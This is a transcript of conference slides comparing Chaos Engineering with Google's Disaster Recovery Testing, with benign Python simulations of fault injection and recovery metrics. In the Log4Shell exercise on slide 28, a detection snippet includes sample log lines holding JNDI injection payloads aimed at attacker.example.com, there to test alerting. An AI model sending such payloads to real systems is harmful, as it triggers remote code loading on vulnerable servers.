Chaos Engineering or DiRT

Slide 1

Slide 1 text

Chaos Engineering or Disaster Recovery Testing
Manizales TechTalks

Slide 2

Slide 2 text

Yury Niño Roa, Cloud AppMod Engineer, @yurynino

Slide 3

Slide 3 text

Are you still mad? I brought you memes. Me: Which ones?

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

Do you know what etymology is?

Slide 6

Slide 6 text

Chaos is complete disorder and confusion. Engineering is the design, building, and use of engines, machines, and structures.

Slide 7

Slide 7 text

What do you get when you join the words?

Slide 8

Slide 8 text

Chaos is complete disorder and confusion. Engineering is the design, building, and use of engines, machines, and structures.

Slide 9

Slide 9 text

Chaos Engineering is the discipline of experimenting on a system in order to build confidence in the system's capability to withstand turbulent conditions in production. https://principlesofchaos.org

Slide 10

Slide 10 text

Disaster is an unexpected event that causes significant destruction or adverse consequences.
Recovery is a return to a normal state of health, mind, or strength.
Testing is the action of checking that someone or something is working as expected.

Slide 11

Slide 11 text

What do you get when you join the words?

Slide 12

Slide 12 text

Slide 13

Slide 13 text

Disaster Recovery Testing (DiRT) is a program run internally at Google in which a group of engineers plans and executes real and fictitious outages to test how effectively the involved teams respond.

Slide 14

Slide 14 text

If I join Cha practices? Am I here to see the same thing I could have found in a dictionary?

Slide 15

Slide 15 text

I asked ChatGPT ...

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

I asked Gemini ...

Slide 18

Slide 18 text

Focus
Chaos Engineering: Proactive identification of systemic weaknesses in complex systems under turbulent conditions.
Disaster Recovery Testing: Test reactive response and recovery procedures in the event of a catastrophic failure or disaster.

Slide 19

Slide 19 text

Method
Chaos Engineering: Controlled experiments are conducted in production, introducing failures (e.g., network latency, server outages) to observe system behavior and uncover hidden vulnerabilities.
Disaster Recovery Testing: Involves simulating a major outage (e.g., data center failure) and testing the ability to restore systems and data within a defined recovery time objective (RTO).
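The chaos engineering method above can be sketched as a tiny experiment: state a steady-state hypothesis, inject a fault, and check whether the hypothesis still holds. This is only an illustration under stated assumptions. `call_service`, `with_injected_latency`, `run_experiment`, the 200 ms threshold, and every number are hypothetical, and the "service" is simulated rather than a real production system.

```python
import random
import statistics


def call_service(base_latency_ms, rng):
    """Hypothetical service call: returns a simulated latency in milliseconds."""
    return base_latency_ms + rng.uniform(0, 10)


def with_injected_latency(fn, extra_ms, probability, rng):
    """Wrap fn so that a fraction of calls gets extra latency (the injected fault)."""
    def wrapped(*args, **kwargs):
        latency = fn(*args, **kwargs)
        if rng.random() < probability:
            latency += extra_ms
        return latency
    return wrapped


def p95(samples):
    """95th percentile of a list of latencies."""
    return statistics.quantiles(samples, n=100)[94]


def run_experiment(threshold_ms=200.0, calls=1000, seed=42):
    """Compare p95 latency without and with the fault against the hypothesis."""
    rng = random.Random(seed)
    baseline = [call_service(50, rng) for _ in range(calls)]
    faulty_call = with_injected_latency(
        call_service, extra_ms=300, probability=0.1, rng=rng
    )
    experiment = [faulty_call(50, rng) for _ in range(calls)]
    return {
        "baseline_p95_ms": p95(baseline),
        "experiment_p95_ms": p95(experiment),
        # Steady-state hypothesis: p95 latency stays under the threshold.
        "hypothesis_holds": p95(experiment) <= threshold_ms,
    }


result = run_experiment()
print(result)
```

In this sketch the hypothesis fails, because roughly one call in ten gets 300 ms of extra latency. A failed hypothesis is the useful outcome of the experiment: it points at a weakness to fix before a real incident finds it.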

Slide 20

Slide 20 text

Goal
Chaos Engineering: To build confidence in the system's ability to withstand unexpected disruptions and improve overall resilience.
Disaster Recovery Testing: To minimize downtime and data loss in the event of a major disruption, ensuring business continuity.

Slide 21

Slide 21 text

It is not because I work for Google, but let me talk a little bit more about DiRT.

Slide 22

Slide 22 text

What is DiRT about?

Slide 23

Slide 23 text

Disaster Recovery Testing
● Google tests software and systems, but also people, preparation, processes, and response tools.
● It's about learning and finding single points of failure, so the scope of services and systems is broad.
● Services are intentionally disrupted in order to learn how to respond and provide reliability.
● Established in 2006 to exercise response to production emergencies.

Slide 24

Slide 24 text

What does Google test?
● Software: Modifying live service configurations, or bringing up services with known bugs.
● Infrastructure: Stress testing large complex architectures, validating SLOs, and ensuring resilience is maintained during disruption.
● Access Controls: Including security, compliance, and privacy.
● People and Workflows: Removing people who might have knowledge or experience.

Slide 25

Slide 25 text

Disaster Recovery Testing
Tier 3: Testing resilience of a specific system or product [no expected external impact].
Tier 2: Testing resilience of dependencies on a shared system or product.
Tier 1: Testing resilience of organizational response to an enterprise-level event.

Slide 26

Slide 26 text

Tier 3 Example: Deploy a bad configuration file.
Scenario
A bad configuration file is included in the next release and increases CPU and memory consumption. This impacts only the users of an experimental feature in a product.
Response
● Incident management protocols from the service's owners.
● The continuous testing of the services defined by the owners.
● Validating disaster readiness and response of a service and the team.
● Identification and expansion of standard tests that can be used to de-risk Tier 2 and Tier 1 testing.
What can you learn?
● If a team is able to effectively perform IMAG.
● If a service is resilient to a specific class of failure.
● If the service is not overly dependent on a specific resource.

Slide 27

Slide 27 text

Tier 2 Example: Run at Service Level
Scenario
An unusually large traffic spike degrades the latency of a heavily used shared internal service. The service remains barely within its published SLA for an extended period.
Response
● Communication to key service consumers.
● Incident management protocols from the service's owners.
● Emergency serving capacity increases.
● Graceful degradation and external messaging to customers.
What can you learn?
● Do service consumers tolerate worst case scenarios, or do they assume the average experience as a baseline?
● Do your alerting and monitoring systems behave the way you want for both service providers and consumers in this scenario?
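One way to explore the first question is to compare each consumer's timeout with the latency bound in the published SLA. The sketch below is a minimal illustration, not a description of how Google runs this test. The `Consumer` type, the consumer names, and all numbers are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Consumer:
    name: str
    timeout_ms: int  # how long this consumer waits before giving up


def consumers_at_risk(consumers, sla_latency_ms):
    """Return names of consumers whose timeout is tighter than the published SLA.

    These consumers were tuned for the average experience and will start
    failing while the shared service is still, formally, within its SLA.
    """
    return [c.name for c in consumers if c.timeout_ms < sla_latency_ms]


# Hypothetical consumers of a shared internal service with a 500 ms SLA.
consumers = [
    Consumer("checkout", timeout_ms=200),
    Consumer("search", timeout_ms=800),
    Consumer("recommendations", timeout_ms=450),
]

at_risk = consumers_at_risk(consumers, sla_latency_ms=500)
print(at_risk)
```

Consumers flagged here are the ones worth contacting before a Tier 2 exercise pushes the shared service to the edge of its SLA.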

Slide 28

Slide 28 text

Tier 1 Example: Hacked!
Scenario
Redeploy an application that uses Apache Log4j2 version 2.14.0, which has a security vulnerability [CVE-2021-44228], launch a script that exploits this vulnerability, and validate that your controls are able to monitor it and generate alerts.
Response
● Security team invokes incident management protocols and business continuity plan.
● All impacted users are notified.
● Support staff isolate impacted workstations and issue emergency alternative OS laptops.
● New policies on the fly. Higher demand on shared computing resources.
What can you learn?
● Creativity and a culture that promotes flexibility help a lot.
● Communication matters, especially when time is limited.
● Expect the unexpected. Back up (and restore) essential data automatically. Validate backup and restoration!
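The "monitor and generate alerts" part of this scenario could be checked with something as small as a log scan for JNDI lookup strings. This is a deliberately naive sketch and an assumption about what such a control might look like. `JNDI_PATTERN`, `find_suspicious_lines`, and the sample log lines are hypothetical, and obfuscated payloads would slip past a pattern this simple.

```python
import re

# Naive pattern for the JNDI lookup strings used to exploit CVE-2021-44228.
# Assumption: real detection rules are broader than this single regex.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)


def find_suspicious_lines(log_lines):
    """Return (line_number, line) pairs that contain a JNDI lookup string."""
    return [
        (number, line)
        for number, line in enumerate(log_lines, start=1)
        if JNDI_PATTERN.search(line)
    ]


# Hypothetical access log captured during the exercise.
sample_log = [
    "GET /index.html 200 Mozilla/5.0",
    "GET /search?q=${jndi:ldap://attacker.example.com/a} 200 curl/7.79",
    "POST /login 401 ${JNDI:RMI://attacker.example.com/b}",
]

alerts = find_suspicious_lines(sample_log)
for number, line in alerts:
    print(f"ALERT line {number}: {line}")
```

During the exercise, the interesting question is whether the real monitoring stack raises an alert for the same lines, and how long it takes.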

Slide 29

Slide 29 text

You told me that this talk would be about CE vs DiRT.
Yes, but I have to sell DiRT.

Slide 30

Slide 30 text

How do you compare these practices?

Slide 31

Slide 31 text

Are you sure they are both practices?

Slide 32

Slide 32 text

Dimension: Objective
Disaster Recovery Testing: To ensure the system can recover from catastrophic failures (e.g., data center outages).
Chaos Engineering: To understand system behavior and improve reliability by intentionally causing failures in a controlled manner.

Slide 33

Slide 33 text

Dimension: Scope
Disaster Recovery Testing: Focuses on business continuity plans, backup systems, and recovery processes.
Chaos Engineering: Focuses on distributed systems' robustness, identifying weaknesses proactively.

Slide 34

Slide 34 text

Dimension: Scenario
Disaster Recovery Testing: Simulates severe, often rare, events such as data loss, hardware failures, or site outages.
Chaos Engineering: Simulates everyday failures like service crashes, latency spikes, or network disruptions.

Slide 35

Slide 35 text

Dimension: Methodology
Disaster Recovery Testing: Involves predefined tests and drills to validate recovery plans and timelines.
Chaos Engineering: Uses experiments designed to stress the system in various ways, often run continuously or periodically.

Slide 36

Slide 36 text

So bored. How many dimensions are there?

Slide 37

Slide 37 text

Dimension: Automation
Disaster Recovery Testing: Often relies on manual or semi-automated procedures and is usually not fully automated.
Chaos Engineering: Highly automated, with tools such as Chaos Monkey that run experiments autonomously.

Slide 38

Slide 38 text

Dimension: Frequency
Disaster Recovery Testing: Conducted periodically (e.g., annually or quarterly) as a planned event.
Chaos Engineering: Can be conducted frequently, even as part of normal operations, to gain ongoing insights.

Slide 39

Slide 39 text

Dimension: Measurement
Disaster Recovery Testing: Evaluates recovery metrics like Recovery Time Objective (RTO) and Recovery Point Objective (RPO).
Chaos Engineering: Assesses system performance, resilience, and the ability to handle stress under failure scenarios.
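The two recovery metrics can be made concrete with a little arithmetic: recovery time is measured from the start of the outage to restoration, and the data loss window is measured from the last good backup to the start of the outage. The sketch below assumes a hypothetical `DrillResult` record and made-up timestamps and targets.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class DrillResult:
    outage_start: datetime
    service_restored: datetime
    last_good_backup: datetime


def evaluate_drill(result, rto, rpo):
    """Compare a drill's measured recovery against its RTO and RPO targets."""
    recovery_time = result.service_restored - result.outage_start
    data_loss_window = result.outage_start - result.last_good_backup
    return {
        "recovery_time": recovery_time,
        "data_loss_window": data_loss_window,
        "rto_met": recovery_time <= rto,
        "rpo_met": data_loss_window <= rpo,
    }


# Hypothetical drill: outage at 10:00, restored at 11:30, last backup at 09:45.
drill = DrillResult(
    outage_start=datetime(2024, 1, 15, 10, 0),
    service_restored=datetime(2024, 1, 15, 11, 30),
    last_good_backup=datetime(2024, 1, 15, 9, 45),
)

report = evaluate_drill(drill, rto=timedelta(hours=2), rpo=timedelta(minutes=10))
print(report)
```

Here the drill meets a 2-hour RTO (recovery took 1.5 hours) but misses a 10-minute RPO, because 15 minutes of data written after the last backup would be lost.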

Slide 40

Slide 40 text

Dimension: Focus
Disaster Recovery Testing: Ensures data integrity, service continuity, and minimal downtime during recovery.
Chaos Engineering: Tests the system's ability to self-heal, maintain service levels, and minimize the blast radius of issues.

Slide 41

Slide 41 text

Dimension: Example
Disaster Recovery Testing: Testing if a backup system can restore data after a simulated data center failure.
Chaos Engineering: Simulating server outages to see if a distributed system can balance load and maintain performance.
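The chaos engineering example can be sketched as a small simulation: take one server out of a pool, redistribute the traffic, and check whether the survivors stay within capacity. Everything here is an assumption for illustration. `distribute`, `survives_outage`, the round-robin policy, and the numbers are hypothetical and stand in for a real load balancer.

```python
def distribute(requests, servers):
    """Round-robin requests across healthy servers; return the load per server."""
    healthy = [name for name, is_up in servers.items() if is_up]
    if not healthy:
        raise RuntimeError("no healthy servers left")
    load = {name: 0 for name in healthy}
    for i in range(requests):
        load[healthy[i % len(healthy)]] += 1
    return load


def survives_outage(requests, servers, capacity_per_server, victim):
    """Simulate losing one server and check the rest stay within capacity."""
    after_outage = dict(servers)
    after_outage[victim] = False
    load = distribute(requests, after_outage)
    return all(count <= capacity_per_server for count in load.values())


# Hypothetical pool of three healthy servers handling 900 requests.
pool = {"a": True, "b": True, "c": True}

print(distribute(900, pool))
print(survives_outage(900, pool, capacity_per_server=500, victim="a"))
print(survives_outage(900, pool, capacity_per_server=400, victim="a"))
```

With 500 requests of capacity per server, the pool absorbs the loss of one server. With 400 it does not, which is the kind of hidden limit such an experiment is meant to surface.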

Slide 42

Slide 42 text

What about the Maturity Assessment?

Slide 43

Slide 43 text

What about the Maturity Assessment?

Slide 44

Slide 44 text

Chaos Engineering Maturity Model

Slide 45

Slide 45 text

Sophistication: Elementary, Simple, Sophisticated, Advanced

Slide 46

Slide 46 text

Adoption: In the Shadows, Investment, Adoption, Cultural Expectation

Slide 47

Slide 47 text

DiRT Maturity Model created by me ...

Slide 48

Slide 48 text

Proprietary + Confidential
DiRT Maturity Model
Dimensions: Persons, Processes, Tools
Levels: Introductory, Defined, Advanced, Managed
Ranks: Padawan, Senior Padawan, Jedi Knight